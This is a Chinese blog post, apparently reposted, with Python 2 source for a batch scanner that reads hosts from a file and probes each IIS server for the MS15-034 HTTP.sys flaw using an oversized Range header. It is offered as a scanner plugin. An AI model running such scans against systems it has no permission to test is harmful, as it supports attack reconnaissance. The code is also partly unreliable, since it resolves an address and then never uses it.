【Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析
来源:互联网 发布:windows徽标键在哪 编辑:程序博客网 时间:2024/05/09 00:59
ms15-034漏洞
影响以下版本操作系统的IIS服务器
Windows 7
Windows 8
Windows server 2008
Windows server 2012
知道其严重性后,在扫描器插件加上这一模块
利用代码如下 需要导入socket模块
其中f2是打开一个文件逐行阅读
f3.write写入本地 代码我从我的扫描器测试版直接截取过来的 不过并不影响阅读
def MS15034(): print '-----------------------------------------------------------' print '----------------------MS15-034 Scan------------------------' print '-----------------------------------------------------------' ipAddr = url hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" #开始配置好相关发送请求 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" try: client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #建立一个客户端用来接受信息 client_socket.connect((ipAddr, 80)) #连接到目标主机的80端口 client_socket.send(req1) #发送数据 boringResp = client_socket.recv(1024) #接受的数据 if "Microsoft" not in boringResp: #判断是否是iis服务器 print "[*]IS Not IIS SERVER" client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #如上 client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: #判断是否存在漏洞 print unicode("[+]发现主机可能存在MS15-034漏洞",'gbk') f3.write(ipAddr + ' ' + 'MS15-034' ) elif " The request has an invalid header name" in goodResp: print '[+]pass..........' else: print '[+]pass..........' pass except Exception,e: print e for ms15 in f2: url = ms15.strip('\n') url=str(url.strip()) url = url.split('//',2)[1] #将http:// 去掉 host = socket.gethostbyname(url) #得到ip地址 MS15034() print unicode('MS15-034扫描完毕!','gbk') time.sleep(2)
0 0
- 【Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析
- 【Python】实现网站常见漏洞扫描+备份扫描+源码分析
- 【Python】STR2漏洞综合扫描+源码分析
- awvs扫描器扫描web漏洞
- Python打造漏洞扫描器 1
- Python打造漏洞扫描器 2
- Python打造漏洞扫描器 3
- Python打造漏洞扫描器 4
- Python打造漏洞扫描器 5
- Python打造漏洞扫描器 6
- Python打造漏洞扫描器 7
- Python打造漏洞扫描器 8
- Python打造漏洞扫描器 9
- Python打造漏洞扫描器 10
- 漏洞扫描器的扫描原理 ZZ
- 源码漏洞扫描工具
- 漏洞批量利用扫描框架
- HTTP.sys 远程执行 代码漏洞 ( MS15-034)
- 蓝桥杯--算法训练 表达式计算
- KubernetesUpAndRunning-Pods
- Java简答题
- kali使用github
- 后缀表达式通过栈实现表达式树
- 【Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析
- 页面的一些测量数据
- 串口使用中断发送字符串,并在LCD显示内容
- Spring_35_在 WEB 应用中使用 Spring
- 【笔记】Spring配置文件中注册三种数据源及从属性文件中读取DB连接四要素
- game
- win7 下jlink v8固件修复
- 浙江大学研究生2005年上机题java实现
- 1-3事件深入